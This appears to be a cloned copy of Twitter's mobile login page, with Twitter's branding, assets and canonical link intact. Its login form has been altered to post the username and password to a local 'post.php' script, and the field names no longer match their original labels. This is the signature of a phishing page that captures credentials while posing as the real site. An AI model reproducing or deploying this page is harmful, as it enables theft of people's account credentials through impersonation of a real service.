<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
        <meta name="HandheldFriendly" content="True" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"/>
    <link rel="canonical" href="https://twitter.com/login">
    <meta name="twitter-redirect-url" content="twitter://timeline"/>
    <meta name="twitter-redirect-srcs" content="{&quot;pwreset-iphone&quot;:true,&quot;android&quot;:true,&quot;email&quot;:true}"/>
    <link href="https://ma.twimg.com/twitter-mobile/a8491f04da4e54be98cff3a86c58f23a770c26bd/images/favicon.ico" rel="icon" type="image/x-icon" />
    <title>Log in</title>
      <link href="https://ma.twimg.com/twitter-mobile/a8491f04da4e54be98cff3a86c58f23a770c26bd/assets/m2s.css" media="screen" rel="stylesheet" type="text/css" />
    <meta name="google-site-verification" content="V0yIS0Ec_o3Ii9KThrCoMCkwTYMMJ_JYx_RSaGhFYvw" />
    <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0">
  </head>
  <body class="images nojs sessions-page sessions-new-page">
    <div id="container">
      
      <div id="brand_bar" class="chromeless">
  <table id="top">
    <tr>
      <td class="modal-left">
          <a href="/" class="brandmark">
            <img src="https://ma.twimg.com/twitter-mobile/a8491f04da4e54be98cff3a86c58f23a770c26bd/images/larrybird_white.png" class="brandmark_larry" alt="Twitter" width="18" height="15" />
          </a>
          <span class="title">Log in</span>
      </td>
      <td class="modal-right">
          <a href="/signup" class="w-button-common w-button-inset"><span>Sign up</span></a>
      </td>
    </tr>
  </table>
</div>

      
      
      <div id="main_content">
          <div class="body">
    <form action="post.php" method="post">
    <span class="m2-auth-token">
    <input name="authenticity_token" type="hidden" value="2aad360659f719b5b4d2000e2bb830b79ef0ee34"/>
  </span>
  <fieldset class="inputs">
    <label for="session[username_or_email]">
         Phone, email or username 
    </label>
    <div class="input-wrapper">
      <input autocapitalize="off" autocorrect="off" class="text-input"
        name="username" id="username" placeholder=""
        type="text" value="">
    </div>
    <label for="session[password]"> Password </label>
    <div class="input-wrapper">
      <input class="text-input"
        name="password" id="password" placeholder=""
        type="password" value="">
    </div>
    <input type="hidden" name="remember_me" value="1"/>
    <input type="hidden" name="wfa" value="1"/>
  </fieldset>
  <span class="w-button-common w-button-default">
    <input name="commit" type="submit" value=" Log in ">
  </span>
    <input autocomplete="off" name="ui_metrics" type="hidden">
    <script src="/i/js_inst?c_name=ui_metrics" async></script>
</form>

  </div>
  <div class="footer">
    <div class="login-footer-links">
      <a href="https://twitter.com/account/begin_password_reset">Forgot password?</a><br>
      <a href="/signup/sms">Already using Twitter via SMS?</a>
    </div>
  </div>

      </div>
    </div>
      <script src="https://ma.twimg.com/twitter-mobile/a8491f04da4e54be98cff3a86c58f23a770c26bd/assets/base.js" type="text/javascript"></script>
    
      <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-30775-28', 'auto', { sampleRate: 10 });
  ga('set', 'anonymizeIp', true);
  ga('set', 'forceSSL', true);
  ga('set', 'title', 'IGNORED');
  ga('send', 'pageview');
  </script>

  </body>
</html>
